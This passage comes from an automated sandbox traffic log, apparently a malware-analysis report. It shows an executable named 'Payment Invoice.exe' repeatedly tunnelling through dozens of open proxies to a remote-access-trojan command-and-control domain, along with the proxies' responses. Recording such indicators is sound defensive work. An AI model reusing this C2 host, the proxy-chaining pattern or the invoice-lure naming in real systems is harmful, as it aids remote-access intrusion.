                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                487192.168.2.451421120.77.148.13880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.477647066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.831968069 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                488192.168.2.451552104.19.235.10807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.477649927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.632364035 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                489192.168.2.451000192.144.30.20080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.477653027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.526925087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                490192.168.2.449995142.54.229.24941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.477761984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                491192.168.2.45147298.181.137.8341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.477860928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                492192.168.2.45145120.37.207.880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.477905035 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Mar 11, 2024 16:15:16.791237116 CET72INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                493192.168.2.451441193.239.56.8480817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.477905035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                494192.168.2.450954103.49.114.19580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.478872061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                495192.168.2.451460121.159.146.251807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.480074883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                496192.168.2.451461203.74.125.1888887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.481121063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                497192.168.2.45162146.22.210.1844437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.481448889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                498192.168.2.45162243.134.238.254437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.481456995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                499192.168.2.451444212.31.100.13841537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.481467962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                500192.168.2.45162446.22.210.1844437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.483788013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                501192.168.2.45162543.134.238.254437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.483853102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                502192.168.2.45143449.228.131.16950007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.485040903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                503192.168.2.451450186.124.164.213807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.485570908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                504192.168.2.45163043.134.238.254437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.487787962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                505192.168.2.45162746.22.210.1844437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.487890959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                506192.168.2.45163243.134.238.254437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.488892078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                507192.168.2.45163346.22.210.1844437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.489450932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                508192.168.2.4514555.252.23.22010817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.491606951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                509192.168.2.45144891.148.127.16280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.492142916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                510192.168.2.45146358.234.116.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.493175030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                511192.168.2.45144291.202.230.21980807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.494745016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                512192.168.2.45141913.234.24.11610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.503025055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.903966904 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                513192.168.2.451446138.36.150.1610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.504054070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                514192.168.2.45153823.152.40.1550507076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.504079103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:47.212022066 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                515192.168.2.45143743.133.136.20888007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.508383989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                516192.168.2.45146427.0.234.20610807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.512542963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                517192.168.2.45146295.66.138.2188807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.528181076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                518192.168.2.45154572.10.160.9030517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.528187990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                519192.168.2.45105972.195.34.60273917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.528240919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                520192.168.2.45154772.10.160.9445957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.528517962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.357928038 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                521192.168.2.45146639.105.5.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.528523922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                522192.168.2.451465185.132.242.21280837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.528872013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                523192.168.2.451458202.162.219.1010807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.534219980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                524192.168.2.45149637.187.77.58218617076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.536056042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                525192.168.2.451507147.75.34.86100007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.545290947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.847358942 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                526192.168.2.45150145.138.87.23810807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.559451103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                527192.168.2.45155124.249.199.1241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.568173885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                528192.168.2.4515158.219.97.248807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.576397896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.905889034 CET718INHTTP/1.1 502 Bad Gateway
                                                                Server: Tengine
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 571
                                                                Connection: close
